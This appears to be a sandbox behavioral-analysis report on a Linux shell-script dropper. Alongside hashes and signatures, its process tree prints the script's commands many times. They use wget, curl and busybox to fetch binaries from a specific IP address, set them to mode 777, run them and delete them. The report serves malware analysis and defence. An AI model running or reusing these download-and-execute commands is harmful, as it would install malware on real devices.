Analysis
-
max time kernel
76s -
max time network
78s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/11/2024, 02:58
Static task
static1
Behavioral task
behavioral1
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
-
Size
10KB
-
MD5
48124ab0f7a89c1c97280cd1d95e50fc
-
SHA1
ff70079ce44da76abf68922c5f8361cd17d819a7
-
SHA256
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01
-
SHA512
5c4601fa8d6ced3bd753fdd73d4e4c272b96a0ee270f6b73aa0e9a24165e2be53a312c8e33de6e0817f5b1ef30ed39cd5382f14f10e2481c5049be72e593ed77
-
SSDEEP
96:u1/LCQIMnbDE0EIP464TrE0YgsvFMnbDE0yc0CgsdIP1t864TrE0pO3LCREo:u1/fI5IP464TrE0YWmPs64TrE0so
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh/tmp/c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:715
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:740
-
-
/bin/chmodchmod 777 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh./AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:754
-
-
/bin/chmodchmod 777 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI./b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:763
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:765
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:782
-
-
/bin/chmodchmod 777 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT./7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:795
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:796
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:803
-
-
/bin/chmodchmod 777 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb./wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:806
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:807
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:817
-
-
/bin/chmodchmod 777 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H./gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:843
-
-
/bin/chmodchmod 777 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN./ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:851
-
-
/bin/chmodchmod 777 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL./cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:860
-
-
/bin/chmodchmod 777 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A./CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:866
-
-
/bin/chmodchmod 777 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL./5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:872
-
-
/bin/chmodchmod 777 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF./OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:878
-
-
/bin/chmodchmod 777 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6./6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:884
-
-
/bin/chmodchmod 777 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ./iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:890
-
-
/bin/chmodchmod 777 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc./jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:896
-
-
/bin/chmodchmod 777 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9./U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:902
-
-
/bin/chmodchmod 777 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL./5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:908
-
-
/bin/chmodchmod 777 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H./gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:914
-
-
/bin/chmodchmod 777 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN./ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:920
-
-
/bin/chmodchmod 777 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL./cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:926
-
-
/bin/chmodchmod 777 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A./CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:932
-
-
/bin/chmodchmod 777 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9./U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:938
-
-
/bin/chmodchmod 777 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF./OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:944
-
-
/bin/chmodchmod 777 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6./6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:950
-
-
/bin/chmodchmod 777 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ./iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:956
-
-
/bin/chmodchmod 777 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc./jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:962
-
-
/bin/chmodchmod 777 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI./b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:968
-
-
/bin/chmodchmod 777 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh./AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:974
-
-
/bin/chmodchmod 777 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb./wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:980
-
-
/bin/chmodchmod 777 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT./7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97